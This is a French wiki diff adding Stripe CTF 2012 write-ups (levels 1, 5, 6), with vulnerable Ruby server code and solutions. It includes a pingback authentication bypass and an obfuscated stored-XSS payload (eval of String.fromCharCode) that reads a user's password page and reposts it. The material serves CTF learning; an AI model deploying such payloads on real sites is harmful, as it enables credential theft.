Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

--- stripe_ctf [2012/08/29 09:52]
mooh [Level 4]
+++ stripe_ctf [2017/04/09 15:33] (Version actuelle)
@@ Ligne 227: / Ligne 227: @@
 > https://level01-2.stripe-ctf.com/user-ntyjkglswi/?attempt=ref:%20refs/heads/master&filename=https://level01-2.stripe-ctf.com/user-ntyjkglswi/level01-code/HEAD
+** Autre solution : **
+> https://level01-2.stripe-ctf.com/user-vleajmvjkj/?attempt=&filename=a
+Le fichier a n'existant pas il suffit de laisser le champ password vide.
 ====== Level 2 ======
@@ Ligne 924: / Ligne 929: @@
 ====== Level 5 ======
+** Enonce **
+>Many attempts have been made at creating a federated identity system for the web (see OpenID, for example).
+>However, none of them have been successful. Until today.
+>The DomainAuthenticator is based off a novel protocol for establishing identities.
+>To authenticate to a site, you simply provide it username, password, and pingback URL. The site posts your credentials
+>to the pingback URL, which returns either "AUTHENTICATED" or "DENIED". If "AUTHENTICATED", the site considers you signed in
+>as a user for the pingback domain.
+>You can check out the Stripe CTF DomainAuthenticator instance here: https://level05-2.stripe-ctf.com/user-afhnkxzjxh.
+>We've been using it to distribute the password to access Level 6. If you could only somehow authenticate as a user of a level05 machine...
+>To avoid nefarious exploits, the machine hosting the DomainAuthenticator has very locked down network access.
+>It can only make outbound requests to other stripe-ctf.com servers. Though, you've heard that someone forgot to internally firewall
+>off the high ports from the Level 2 server.
+>Interesting in setting up your own DomainAuthenticator? You can grab the source from
+>git clone https://level05-2.stripe-ctf.com/user-afhnkxzjxh/level05-code, or by reading on below.
+** Code **
+The contents of srv.rb
+<code ruby>
+#!/usr/bin/env ruby
+require 'rubygems'
+require 'bundler/setup'
+require 'logger'
+require 'uri'
+require 'restclient'
+require 'sinatra'
+$log = Logger.new(STDERR)
+$log.level = Logger::INFO
+module DomainAuthenticator
+  class DomainAuthenticatorSrv < Sinatra::Base
+    set :environment, :production
+    # Run with the production file on the server
+    if File.exists?('production')
+      PASSWORD_HOSTS = /^level05-\d+\.stripe-ctf\.com$/
+      ALLOWED_HOSTS = /\.stripe-ctf\.com$/
+    else
+      PASSWORD_HOSTS = /^localhost$/
+      ALLOWED_HOSTS = //
+    end
+    PASSWORD = File.read('password.txt').strip
+    enable :sessions
+    # Use persistent entropy file
+    entropy_file = 'entropy.dat'
+    unless File.exists?(entropy_file)
+      File.open(entropy_file, 'w') do |f|
+        f.write(OpenSSL::Random.random_bytes(24))
+      end
+    end
+    set :session_secret, File.read(entropy_file)
+    get '/*' do
+      output = <<EOF
+<p>
+  Welcome to the Domain Authenticator. Please authenticate as a user from
+  your domain of choice.
+</p>
+<form action="" method="POST">
+<p>Pingback URL: <input type="text" name="pingback" /></p>
+<p>Username: <input type="text" name="username" /></p>
+<p>Password: <input type="password" name="password" /></p>
+<p><input type="submit" value="Submit"></p>
+</form>
+EOF
+      user = session[:auth_user]
+      host = session[:auth_host]
+      if user && host
+        output += "<p> You are authenticated as #{user}@#{host}. </p>"
+        if host =~ PASSWORD_HOSTS
+          output += "<p> Since you're a user of a password host and all,"
+          output += " you deserve to know this password: #{PASSWORD} </p>"
+        end
+      end
+      output
+    end
+    post '/*' do
+      pingback = params[:pingback]
+      username = params[:username]
+      password = params[:password]
+      pingback = "http://#{pingback}" unless pingback.include?('://')
+      host = URI.parse(pingback).host
+      unless host =~ ALLOWED_HOSTS
+        return "Host not allowed: #{host}" \
+               " (allowed authentication hosts are #{ALLOWED_HOSTS.inspect})"
+      end
+      begin
+        body = perform_authenticate(pingback, username, password)
+      rescue StandardError => e
+        return "An unknown error occurred while requesting #{pingback}: #{e}"
+      end
+      if authenticated?(body)
+        session[:auth_user] = username
+        session[:auth_host] = host
+        return "Remote server responded with: #{body}." \
+               " Authenticated as #{username}@#{host}!"
+      else
+        session[:auth_user] = nil
+        session[:auth_host] = nil
+        sleep(1) # prevent abuse
+        return "Remote server responded with: #{body}." \
+               " Unable to authenticate as #{username}@#{host}."
+      end
+    end
+    def perform_authenticate(url, username, password)
+      $log.info("Sending request to #{url}")
+      response = RestClient.post(url, {:password => password,
+                                       :username => username})
+      body = response.body
+      $log.info("Server responded with: #{body}")
+      body
+    end
+    def authenticated?(body)
+      body =~ /[^\w]AUTHENTICATED[^\w]*$/
+    end
+  end
+end
+def main
+  DomainAuthenticator::DomainAuthenticatorSrv.run!
+end
+if $0 == __FILE__
+  main
+  exit(0)
+end
+</code>
+** Solution **
+On a un formulaire avec 3 champs, l'url pour le pingback, le username et le password. L'application va faire une requete au serveur dont l'url a ete donnee et en fonction du resultat, l'utilisateur sera authentifie sur ce serveur.
+<code ruby>
+      PASSWORD_HOSTS = /^level05-\d+\.stripe-ctf\.com$/
+      ALLOWED_HOSTS = /\.stripe-ctf\.com$/
+</code>
+On remarque que seuls les serveurs sur ''stripe-ctf.com'' sont permis. L'indice avec les high ports du serveur 2 est en fait un faux indice. C'est juste pour nous rappeler qu'il est possible d'uploader des fichiers sur ce serveur.
+Pour etre authentifie, la reponse du serveur doit verifier:
+<code ruby>
+    def authenticated?(body)
+      body =~ /[^\w]AUTHENTICATED[^\w]*$/
+    end
+</code>
+Si on upload le fichier suivant
+<code php>
+<?php
+  echo " AUTHENTICATED ";
+?>
+</code>
+et on l'utilise directement comme adresse de pingback (https://level02-3.stripe-ctf.com/user-zjfpnuykfi/uploads/test3.php), l'application nous dit qu'on est bien authentifie. Malheureusement le mot de passe ne s'affiche pas car on est authentifie sur le serveur 02 et non 05
+<code>
+output += "<p> You are authenticated as #{user}@#{host}. </p>"
+        if host =~ PASSWORD_HOSTS
+          output += "<p> Since you're a user of a password host and all,"
+          output += " you deserve to know this password: #{PASSWORD} </p>"
+        end
+</code>
+Il faut donc que l'url du pingback serveur commence par level05. Et comme l'a fait remarque Mortis, en ruby params lit les parametre GET et POST. En utilisant comme url https://level05-2.stripe-ctf.com/user-afhnkxzjxh/?pingback=https://level02-3.stripe-ctf.com/user-zjfpnuykfi/uploads/test3.php, l'application va faire un double pingback. Il faut donc que la premiere requete vers le serveur 02 verifie la regex ''body =~ /[^\w]AUTHENTICATED[^\w]*$/''. La reponse est de la forme: ''Server responded with: AUTHENTICATED ...''. Si on utilise le meme fichier, lors du second pingback, la reponse ne verifie plus la condition ''body =~ /[^\w]AUTHENTICATED[^\w]*$/'' a cause du ''Server responded with'' sur la meme ligne. Il faut donc modifier le fichier php pour que cette condition soit aussi verifiee. En utilisant
+<code php>
+<?php
+ echo "\n";
+ echo " AUTHENTICATED ";
+ echo "\n";
+?>
+</code>
+les 2 reponses des 2 pingbacks sont valides et l'application nous dit qu'on est authentifie sur le serveur 05 et affiche le mot de passe
 ====== Level 6 ======
+** Enonce **
+>After Karma Trader from Level 4 was hit with massive karma inflation (purportedly due to someone flooding the market with massive quantities of karma), the site had to close its doors. All hope was not lost, however, since the technology was acquired by a real up-and-comer, Streamer. Streamer is the self-proclaimed most steamlined way of sharing updates with your friends. You can access your Streamer instance here: https://level06-2.stripe-ctf.com/user-fgdshrgpxf
+>The Streamer engineers, realizing that security holes had led to the demise of Karma Trader, have greatly beefed up the security of their application. Which is really too bad, because you've learned that the holder of the password to access Level 7, level07-password-holder, is the first Streamer user.
+>As well, level07-password-holder is taking a lot of precautions: his or her computer has no network access besides the Streamer server itself, and his or her password is a complicated mess, including quotes and apostrophes and the like.
+>Fortunately for you, the Streamer engineers have decided to open-source their application so that other people can run their own Streamer instances. You can obtain the source for Streamer at git clone https://level06-2.stripe-ctf.com/user-fgdshrgpxf/level06-code. We've also included the most important files below.
+** Code **
+The contents of srv.rb
+<code ruby>
+#!/usr/bin/env ruby
+require 'rubygems'
+require 'bundler/setup'
+require 'rack/utils'
+require 'rack/csrf'
+require 'json'
+require 'sequel'
+require 'sinatra'
+module Streamer
+  PASSWORD = File.read('password.txt').strip
+  # Only needed in production
+  URL_ROOT = File.read('url_root.txt').strip rescue ''
+  module DB
+    def self.db_file
+      'streamer.db'
+    end
+    def self.conn
+      @conn ||= Sequel.sqlite(db_file)
+    end
+    def self.safe_insert(table, key_values)
+      key_values.each do |key, value|
+        # Just in case people try to exfiltrate
+        # level07-password-holder's password
+        if value.kind_of?(String) &&
+            (value.include?('"') || value.include?("'"))
+          raise "Value has unsafe characters"
+        end
+      end
+      conn[table].insert(key_values)
+    end
+    def self.init
+      return if File.exists?(db_file)
+      File.umask(0066)
+      conn.create_table(:users) do
+        primary_key :id
+        String :username
+        String :password
+        Time :last_active
+      end
+      conn.create_table(:posts) do
+        primary_id :id
+        String :user
+        String :title
+        String :body
+        Time :time
+      end
+      conn[:users].insert(:username => 'level07-password-holder',
+        :password => Streamer::PASSWORD,
+        :last_active => Time.now.utc)
+      conn[:posts].insert(:user => 'level07-password-holder',
+        :title => 'Hello World',
+        :body => "Welcome to Streamer, the most streamlined way of sharing
+updates with your friends!
+One great feature of Streamer is that no password resets are needed. I, for
+example, have a very complicated password (including apostrophes, quotes, you
+name it!). But I remember it by clicking my name on the right-hand side and
+seeing what my password is.
+Note also that Streamer can run entirely within your corporate firewall. My
+machine, for example, can only talk directly to the Streamer server itself!",
+        :time => Time.now.utc)
+    end
+  end
+  class StreamerSrv < Sinatra::Base
+    set :environment, :production
+    enable :sessions
+    # Use persistent entropy file
+    entropy_file = 'entropy.dat'
+    unless File.exists?(entropy_file)
+      File.open(entropy_file, 'w') do |f|
+        f.write(OpenSSL::Random.random_bytes(24))
+      end
+    end
+    set :session_secret, File.read(entropy_file)
+    use Rack::Csrf, :raise => true
+    helpers do
+      def absolute_url(path)
+        Streamer::URL_ROOT + path
+      end
+      # Insert an hidden tag with the anti-CSRF token into your forms.
+      def csrf_tag
+        Rack::Csrf.csrf_tag(env)
+      end
+      # Return the anti-CSRF token
+      def csrf_token
+        Rack::Csrf.csrf_token(env)
+      end
+      # Return the field name which will be looked for in the requests.
+      def csrf_field
+        Rack::Csrf.csrf_field
+      end
+      include Rack::Utils
+      alias_method :h, :escape_html
+    end
+    def redirect(url)
+      super(absolute_url(url))
+    end
+    before do
+      @user = logged_in_user
+      update_last_active
+    end
+    def logged_in_user
+      if session[:user]
+        @username = session[:user]
+        @user = DB.conn[:users][:username => @username]
+      end
+    end
+    def update_last_active
+      return unless @user
+      DB.conn[:users].where(:username => @user[:username]).
+        update(:last_active => Time.now.utc)
+    end
+    def recent_posts
+      # Grab the 5 most recent posts
+      DB.conn[:posts].reverse_order(:time).limit(5).to_a.reverse
+    end
+    def registered_users
+      DB.conn[:users].reverse_order(:id)
+    end
+    def die(msg, view)
+      @error = msg
+      halt(erb(view))
+    end
+    get '/' do
+      if @user
+        @registered_users = registered_users
+        @posts = recent_posts
+        erb :home
+      else
+        erb :login
+      end
+    end
+    get '/register' do
+      erb :register
+    end
+    post '/register' do
+      username = params[:username]
+      password = params[:password]
+      unless username && password
+        die("Please specify both a username and a password.", :register)
+      end
+      unless DB.conn[:users].where(:username => username).count == 0
+        die("This username is already registered. Try another one.",
+            :register)
+      end
+      DB.safe_insert(:users,
+        :username => username,
+        :password => password,
+        :last_active => Time.now.utc
+        )
+      session[:user] = username
+      redirect '/'
+    end
+    get '/login' do
+      redirect '/'
+    end
+    post '/login' do
+      username = params[:username]
+      password = params[:password]
+      user = DB.conn[:users][:username => username, :password => password]
+      unless user
+        die('Could not authenticate. Perhaps you meant to register a new' \
+            ' account? (See link below.)', :login)
+      end
+      session[:user] = user[:username]
+      redirect '/'
+    end
+    get '/logout' do
+      session.clear
+      redirect '/'
+    end
+    get '/user_info' do
+      @password = @user[:password]
+      erb :user_info
+    end
+    before '/ajax/*' do
+      halt(403, 'Must be logged in!') unless @user
+    end
+    get '/ajax/posts' do
+      recent_posts.to_json
+    end
+    post '/ajax/posts' do
+      msg = create_post
+      resp = {:response => msg}
+      resp.to_json
+    end
+    # Fallback if JS breaks
+    get '/posts' do
+      redirect '/'
+    end
+    post '/posts' do
+      create_post if @user
+      redirect '/'
+    end
+    def create_post
+      post_body = params[:body]
+      title = params[:title] || 'untitled'
+      if post_body
+        DB.safe_insert(:posts,
+          :user => @user[:username],
+          :title => title,
+          :body => post_body,
+          :time => Time.now.utc
+          )
+        'Successfully added the post!'
+      else
+        'No post body given!'
+      end
+    end
+  end
+end
+def main
+  Streamer::DB.init
+  Streamer::StreamerSrv.run!
+end
+if $0 == __FILE__
+  main
+  exit(0)
+end
+</code>
+The contents of views/home.erb
+<code ruby>
+<div class='row'>
+  <div class='span9'>
+    <h3>Stream of Posts</h3>
+    <table id='posts' class='table table-bordered table-condensed'>
+      <tbody>
+      </tbody>
+    </table>
+    <script>
+      var username = "<%= @username %>";
+      var post_data = <%= @posts.to_json %>;
+      function escapeHTML(val) {
+        return $('<div/>').text(val).html();
+      }
+      function addPost(item) {
+        var new_element = '<tr><th>' + escapeHTML(item['user']) +
+            '</th><td><h4>' + escapeHTML(item['title']) + '</h4>' +
+            escapeHTML(item['body']) + '</td></tr>';
+        $('#posts > tbody:last').prepend(new_element);
+      }
+      for(var i = 0; i < post_data.length; i++) {
+        var item = post_data[i];
+        addPost(item);
+      };
+    </script>
+    <form id='new_post' name='new_post' action='<%= absolute_url("/posts") %>'
+          method='POST'>
+      <%= csrf_tag %>
+      <fieldset>
+        <div class='control-group'>
+          <label class='control-label' for='title'>Title:</label>
+          <div class='controls'>
+            <input class='input-medium' name='title' id='title' type='text'/>
+          </div>
+        </div>
+        <div class='control-group'>
+          <label class='control-label' for='content'>Content:</label>
+          <div class='controls'>
+            <textarea class='input-xlarge' name='body' id='content'
+              type='text'>Your post here...</textarea>
+          </div>
+        </div>
+        <div class='form-actions'>
+          <input class='btn btn-primary' type='submit' value='Post'/>
+        </div>
+        <div id='status' name='status' class="alert alert-info">
+          Ready and waiting!
+        </div>
+      </fieldset>
+    </form>
+    <script>
+      $(document).ready(function() {
+        $('#new_post').submit(function(e) {
+          var new_post_data = {
+            title: $("#title").val(),
+            body: $("#content").val(),
+            <%= csrf_field %>: "<%= csrf_token %>"
+          };
+          $.post('<%= absolute_url("/ajax/posts") %>',
+                 new_post_data,
+                 function(data) {
+            var status_text = $.parseJSON(data);
+            $('#status').html(status_text['response']);
+            new_post_data['user'] = username;
+            addPost(new_post_data);
+          });
+          e.preventDefault();
+          return false;
+        });
+      });
+    </script>
+  </div>
+  <div class='span3'>
+    <h3>Users Online</h3>
+    <table class='table table-condensed'>
+      <% @registered_users.each do |user| %>
+        <tr>
+          <td>
+            <% if @username == user[:username] %>
+              <em>
+                <a href='<%= absolute_url("/user_info") %>' target='_blank'>
+                  <%=h user[:username] %> (me)i
+                </a>
+              </em>
+            <% else %>
+              <%=h user[:username] %>
+            <% end %>
+            <br />
+            <span style="font-size:10px">
+              Last active: <%= user[:last_active].strftime('%H:%M:%S UTC') %>
+            </span>
+          </td>
+        </tr>
+      <% end %>
+    </table>
+  </div>
+</div>
+</code>
+The contents of views/login.erb
+<code ruby>
+<div class='row'>
+  <div class='span12'>
+    <h3>Login</h3>
+    <br />
+    <p>
+      Sign into your Streamer account, and instantly start sharing updates
+      with your friends. If you don't have an account yet,
+      <a href='<%= absolute_url ("/register") %>'>create one now</a>!
+    </p>
+    <br />
+    <form class='form-inline' action='<%= absolute_url("/login") %>'
+          method='post'>
+      <%= csrf_tag %>
+      <input class='input-medium' name='username' type='text'
+             placeholder='Username'/>
+      <input class='input-medium' name='password' type='password'
+             placeholder='Password'/>
+      <input class='btn btn-primary' type='submit' value='Sign In'/>
+    </form>
+  </div>
+</div>
+</code>
+The contents of views/register.erb
+<code ruby>
+<div class='row'>
+  <div class='span12'>
+    <h3>Register for a Streamer account</h3>
+    <br />
+    <form class='form-horizontal' action='<%= absolute_url("/register") %>'
+          method='post'>
+      <%= csrf_tag %>
+      <fieldset>
+        <div class='control-group'>
+          <label class='control-label' for='username'>Username:</label>
+          <div class='controls'>
+            <input class='input-medium' name='username' id='username'
+                   type='text' placeholder='Username'/>
+          </div>
+        </div>
+        <div class='control-group'>
+          <label class='control-label' for='username'>Password:</label>
+          <div class='controls'>
+            <input class='input-medium' name='password' id='password'
+                   type='password' placeholder='Password'/>
+          </div>
+        </div>
+        <div class='form-actions'>
+          <input class='btn btn-primary' type='submit' value='Register'/>
+        </div>
+      </fieldset>
+    </form>
+  </div>
+</div>
+</code>
+The contents of views/layout.erb
+<code ruby>
+<!doctype html>
+<html>
+  <head>
+    <title>Streamer</title>
+    <script src='<%= absolute_url('/js/jquery-1.8.0.min.js') %>'></script>
+    <link rel='stylesheet' type='text/css'
+          href='<%= absolute_url('/css/bootstrap-combined.min.css') %>' />
+  </head>
+  <body>
+    <div class='navbar'>
+      <div class='navbar-inner'>
+        <div class='container'>
+          <a class='brand' href='<%= absolute_url("/") %>'>Streamer</a>
+          <% if @user %>
+            <ul class='nav pull-right'>
+              <li><a href='<%= absolute_url("/logout") %>'>Log Out</a></li>
+            </ul>
+          <% end %>
+        </div>
+      </div>
+    </div>
+    <div class='container'>
+<% if @error %>
+  <p>Error: <%= @error %></p>
+<% end %>
+<% if @success %>
+  <p>Success: <%= @success %></p>
+<% end %>
+      <%= yield %>
+    </div>
+  </body>
+</html>
+</code>
+The contents of views/user_info.erb
+<code ruby>
+<div class='row'>
+  <div class='span12'>
+    <h3>User Information</h3>
+    <table class='table table-condensed'>
+      <tr>
+        <th>Username:</th>
+        <td><%= @username %></td>
+      </tr>
+      <tr>
+        <th>Password:</th>
+        <td><%= @password %></td>
+      </tr>
+    </table>
+  </div>
+</div>
+</code>
+** Solution **
+Une fois enregistre, la page principale contient une liste de posts et la liste des utilisateurs en ligne. L'utilisateur peut ajouter des nouveaux posts et cliquer sur son nom. Ceci ouvrira la page ''user_info'' qui contient le username et le password.
+Comme pour l'epreuve du karma, l'idee est de forger un post de maniere a ce que quand celui-ci sera affiche par l'utilisateur level07-password-holder, les donnees de la page ''user_info'' seront lues et directement postees.
+Voila un exemple de script que l'on pourrait utiliser
+<code javascript>
+$(function()
+{
+$(window).bind('load', function()
+{
+function httpGet(theUrl)
+    {
+    var xmlHttp = null;
+    xmlHttp = new XMLHttpRequest();
+    xmlHttp.open( "GET", theUrl, false );
+    xmlHttp.send( null );
+    return xmlHttp.responseText;
+    }
+value = httpGet("https://level06-2.stripe-ctf.com/user-fgdshrgpxf/user_info")
+output = "";
+	for(i=0; i<value.length; ++i)
+	{
+		if(output != "") output += ", ";
+		output += value.charCodeAt(i);
+	}
+document.getElementById("new_post").title.value = "pw"
+document.getElementById("new_post").content.value = output
+document.getElementById("new_post").submit()
+});
+});
+</code>
+On remarque l'utilisation de ''$(window).bind('load', function()'' car il faut attendre que la page soit entierement chargee avant de pouvoir utiliser le formulaire.
+On encode aussi le resultat de la requete GET car sinon il y a des problemes d'encodage quand on cree un post avec le contenu html.
+Il ne reste plus qu'a trouver un endroit ou on peut injecter notre code.
+Et c'est dans le username. Si on essaie de mettre le script entier dans le username, il y a une erreur au niveau du serveur, on va donc l'encoder egalement, ce qui donne
+<code javascritp>
+<script>
+eval(String.fromCharCode(36,40,102,117,110,99,116,105,111,110,40,41,10,123,10,10,36,40,119,105,110,100,111,119,41,46,98,105,110,100,40,39,108,111,97,100,39,44,32,102,117,110,99,116,105,111,110,40,41,10,123,10,10,102,117,110,99,116,105,111,110,32,104,116,116,112,71,101,116,40,116,104,101,85,114,108,41,10,32,32,32,32,123,10,32,32,32,32,118,97,114,32,120,109,108,72,116,116,112,32,61,32,110,117,108,108,59,10,10,32,32,32,32,120,109,108,72,116,116,112,32,61,32,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,10,32,32,32,32,120,109,108,72,116,116,112,46,111,112,101,110,40,32,34,71,69,84,34,44,32,116,104,101,85,114,108,44,32,102,97,108,115,101,32,41,59,10,32,32,32,32,120,109,108,72,116,116,112,46,115,101,110,100,40,32,110,117,108,108,32,41,59,10,32,32,32,32,114,101,116,117,114,110,32,120,109,108,72,116,116,112,46,114,101,115,112,111,110,115,101,84,101,120,116,59,10,32,32,32,32,125,10,10,118,97,108,117,101,32,61,32,104,116,116,112,71,101,116,40,34,104,116,116,112,115,58,47,47,108,101,118,101,108,48,54,45,50,46,115,116,114,105,112,101,45,99,116,102,46,99,111,109,47,117,115,101,114,45,102,103,100,115,104,114,103,112,120,102,47,117,115,101,114,95,105,110,102,111,34,41,10,10,111,117,116,112,117,116,32,61,32,34,34,59,10,9,102,111,114,40,105,61,48,59,32,105,60,118,97,108,117,101,46,108,101,110,103,116,104,59,32,43,43,105,41,10,9,123,10,9,9,105,102,40,111,117,116,112,117,116,32,33,61,32,34,34,41,32,111,117,116,112,117,116,32,43,61,32,34,44,32,34,59,10,9,9,111,117,116,112,117,116,32,43,61,32,118,97,108,117,101,46,99,104,97,114,67,111,100,101,65,116,40,105,41,59,10,9,125,10,10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,110,101,119,95,112,111,115,116,34,41,46,116,105,116,108,101,46,118,97,108,117,101,32,61,32,34,112,119,34,10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,110,101,119,95,112,111,115,116,34,41,46,99,111,110,116,101,110,116,46,118,97,108,117,101,32,61,32,111,117,116,112,117,116,10,10,10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,110,101,119,95,112,111,115,116,34,41,46,115,117,98,109,105,116,40,41,10,10,125,41,59,10,125,41,59))
+</script>
+</code>
+On cree ensuite un post quelconque et on attend que l'utilisateur 07 se connecte et on recupere son post
+<code>
+, 33, 100, 111, 99, 116, 121, 112, 101, 32, 104, 116, 109, 108, 62, 10, 60, 104, 116, 109, 108, 62, 10, 32, 32, 60, 104, 101, 97, 100, 62, 10, 32, 32, 32, 32, 60, 116, 105, 116, 108, 101, 62, 83, 116, 114, 101, 97, 109, 101, 114, 60, 47, 116, 105, 116, 108, 101, 62, 10, 32, 32, 32, 32, 60, 115, 99, 114, 105, 112, 116, 32, 115, 114, 99, 61, 39, 47, 117, 115, 101, 114, 45, 102, 103, 100, 115, 104, 114, 103, 112, 120, 102, 47, 106, 115, 47, 106, 113, 117, 101, 114, 121, 45, 49, 46, 56, 46, 48, 46, 109, 105, 110, 46, 106, 115, 39, 62, 60, 47, 115, 99, 114, 105, 112, 116, 62, 10, 32, 32, 32, 32, 60, 108, 105, 110, 107, 32, 114, 101, 108, 61, 39, 115, 116, 121, 108, 101, 115, 104, 101, 101, 116, 39, 32, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 99, 115, 115, 39, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 104, 114, 101, 102, 61, 39, 47, 117, 115, 101, 114, 45, 102, 103, 100, 115, 104, 114, 103, 112, 120, 102, 47, 99, 115, 115, 47, 98, 111, 111, 116, 115, 116, 114, 97, 112, 45, 99, 111, 109, 98, 105, 110, 101, 100, 46, 109, 105, 110, 46, 99, 115, 115, 39, 32, 47, 62, 10, 32, 32, 60, 47, 104, 101, 97, 100, 62, 10, 32, 32, 60, 98, 111, 100, 121, 62, 10, 32, 32, 32, 32, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 39, 110, 97, 118, 98, 97, 114, 39, 62, 10, 32, 32, 32, 32, 32, 32, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 39, 110, 97, 118, 98, 97, 114, 45, 105, 110, 110, 101, 114, 39, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 39, 99, 111, 110, 116, 97, 105, 110, 101, 114, 39, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 60, 97, 32, 99, 108, 97, 115, 115, 61, 39, 98, 114, 97, 110, 100, 39, 32, 104, 114, 101, 102, 61, 39, 47, 117, 115, 101, 114, 45, 102, 103, 100, 115, 104, 114, 103, 112, 120, 102, 47, 39, 62, 83, 116, 114, 101, 97, 109, 101, 114, 60, 47, 97, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 60, 117, 108, 32, 99, 108, 97, 115, 115, 61, 39, 110, 97, 118, 32, 112, 117, 108, 108, 45, 114, 105, 103, 104, 116, 39, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 60, 108, 105, 62, 60, 97, 32, 104, 114, 101, 102, 61, 39, 47, 117, 115, 101, 114, 45, 102, 103, 100, 115, 104, 114, 103, 112, 120, 102, 47, 108, 111, 103, 111, 117, 116, 39, 62, 76, 111, 103, 32, 79, 117, 116, 60, 47, 97, 62, 60, 47, 108, 105, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 60, 47, 117, 108, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 10, 32, 32, 32, 32, 32, 32, 32, 32, 60, 47, 100, 105, 118, 62, 10, 32, 32, 32, 32, 32, 32, 60, 47, 100, 105, 118, 62, 10, 32, 32, 32, 32, 60, 47, 100, 105, 118, 62, 10, 32, 32, 32, 32, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 39, 99, 111, 110, 116, 97, 105, 110, 101, 114, 39, 62, 10, 10, 32, 32, 32, 32, 32, 32, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 39, 114, 111, 119, 39, 62, 10, 32, 32, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 39, 115, 112, 97, 110, 49, 50, 39, 62, 10, 32, 32, 32, 32, 60, 104, 51, 62, 85, 115, 101, 114, 32, 73, 110, 102, 111, 114, 109, 97, 116, 105, 111, 110, 60, 47, 104, 51, 62, 10, 32, 32, 32, 32, 60, 116, 97, 98, 108, 101, 32, 99, 108, 97, 115, 115, 61, 39, 116, 97, 98, 108, 101, 32, 116, 97, 98, 108, 101, 45, 99, 111, 110, 100, 101, 110, 115, 101, 100, 39, 62, 10, 32, 32, 32, 32, 32, 32, 60, 116, 114, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 60, 116, 104, 62, 85, 115, 101, 114, 110, 97, 109, 101, 58, 60, 47, 116, 104, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 60, 116, 100, 62, 108, 101, 118, 101, 108, 48, 55, 45, 112, 97, 115, 115, 119, 111, 114, 100, 45, 104, 111, 108, 100, 101, 114, 60, 47, 116, 100, 62, 10, 32, 32, 32, 32, 32, 32, 60, 47, 116, 114, 62, 10, 32, 32, 32, 32, 32, 32, 60, 116, 114, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 60, 116, 104, 62, 80, 97, 115, 115, 119, 111, 114, 100, 58, 60, 47, 116, 104, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 60, 116, 100, 62, 39, 68, 83, 109, 98, 88, 77, 102, 87, 112, 107, 106, 88, 34, 60, 47, 116, 100, 62, 10, 32, 32, 32, 32, 32, 32, 60, 47, 116, 114, 62, 10, 32, 32, 32, 32, 60, 47, 116, 97, 98, 108, 101, 62, 10, 32, 32, 60, 47, 100, 105, 118, 62, 10, 60, 47, 100, 105, 118, 62, 10, 10, 32, 32, 32, 32, 60, 47, 100, 105, 118, 62, 10, 32, 32, 60, 47, 98, 111, 100, 121, 62, 10, 60, 47, 104, 116, 109, 108, 62, 10
+</code>
+Un coup de ''fromCharCode'' et on obtient son mot de passe
 ====== Level 7 ======
 ====== Level 8 ======

Zenk - Security

Outils d'utilisateurs

Outils du Site

Différences

Outils de la Page